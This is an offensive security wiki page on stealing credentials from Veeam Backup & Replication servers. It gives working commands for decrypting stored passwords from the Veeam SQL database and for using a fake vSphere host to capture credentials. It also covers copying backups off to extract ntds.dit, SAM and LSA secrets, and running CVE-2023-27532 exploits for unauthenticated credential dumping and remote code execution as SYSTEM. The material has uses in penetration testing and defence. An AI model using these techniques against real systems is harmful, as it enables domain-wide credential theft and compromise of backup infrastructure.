Veeam Backup
MITRE ATT&CK™ Credential Access - Tactic TA0006
Theory
Veeam Backup & Recplication is a widely used tool for backing up virtual environments built on VMware vSphere, Nutanix AHV, and Microsoft Hyper-V hypervisors. If you manage to compromise the Veeam Backup & Replication serveur, you can extract passwords and hashes from its database or from the machines that are backed up
Practice
Credentials Dump
Veeam requires the username and password for any machine you want to back it up. The user provided should have high privileges on the machine, so usually, if you're going to backup the domain devices, you will put administrator creds. Veeam stores these creds on MS-SQL using ProtectedData.Protect method of CryptoAPI. You can easily extract them if you have admin privilege on the Veeam Server.
You can do this step by running the veeam-creds script and extract passwords.
.\Veeam-Get-Creds.ps1If you are able to connect to the Veeam console and you have the right to create new connections to the hypervisor. You can have Veeam connect to a fake vSphere host.
First, run veampot.py on your attacking machine
python3 veampot.pyThen, create a new connection to the vSphere server in the Veeam console in the Inventory section;
Enter the address of the machine with the running script specifying the connection port
8443;Select the required account and complete the wizard.
Finlay, get password in script output.
From SQL management studio (of any SQL management interface access method) run the following again the veeam managemnt database:
SELECT TOP (1000) [id]
,[user_name]
,[password]
,[usn]
,[description]
,[visible]
,[change_time_utc]
FROM [VeeamBackup].[dbo].[Credentials] This will dumpt the password hashes. Copy them and then run a PowerShell interface
Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
$encoded = 'INSERT_HASH_HERE'
[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) You may use the VeeamGetCreds.yaml PowerShell Empire module witch adapted Veeam-Get-Creds.ps1 script.
copy VeeamGetCreds.yaml to empire/server/modules/powershell/credentials/ folder
Run Empire server and client
Use as usual Empire module by name /powershell/credentials/VeeamGetCreds
Backup Machines - Hashes Extraction
If you can access a backup image, you can restore it on your local disk. More interesting, we can use the Veam individual files recover feature. Depending on the server backup type, you may extract SAM and LSA secrets from registry hives or even the NTDS.dit file if it's a domain controller. Check this section for more information about credentials dumping.
When you have a valid backup image, Veeam provides a restore mechanism by "VBK Extract". You can exfiltrate the backup images and extract the backup in multiple extensions like VMDM, VHD, or VHDX on your attacking host.
#Before, copy backups files in the current directory
#VBK Extract on linux
tar -zxvf VeamExtract*
./extractWe can then create a new VM from this files or mount it to our disk to recover sensitive files.
From the Veeam console, to restore individual files, you need to select the required VM from the list of tasks from the section Backups > Disk > ${JOB_NAME} and select the recovery mode for individual files from the menu.
After completing the wizard, a file selection window will open. To restore and decrypt the Active Directory database, you can extract several files:
ntds.dit — encrypted AD database;
SYSTEM — registry branch containing the BootKey encryption key;
SECURITY — registry branch containing cached LSA Secrets passwords;
SAM — The Security Accounts Manager, which contains password hashes of local users.
Unauthenticated Credentials Dump & RCE - CVE-2023-27532
Vulnerability CVE-2023-27532 in a Veeam Backup & Replication component allows an unauthenticated user operating within the backup infrastructure network perimeter to obtain encrypted credentials stored in the configuration database or perform remote code execution.
We may use the sfewer-r7's exploit (C#) to dump credentials from a remote Veeam server.
VeeamHax.exe --target <VEAM_IP>Alternatively, we may use this exploit (C#) from horizon3ai.
CVE-2023-27532.exe net.tcp://<VEAM_IP>:9401/We may use the sfewer-r7's exploit (C#) to run an arbitrary command with local system privileges on the remote Veeam server.
VeeamHax.exe --target 192.168.0.100 --cmd calc.exeReferences
Last updated
Was this helpful?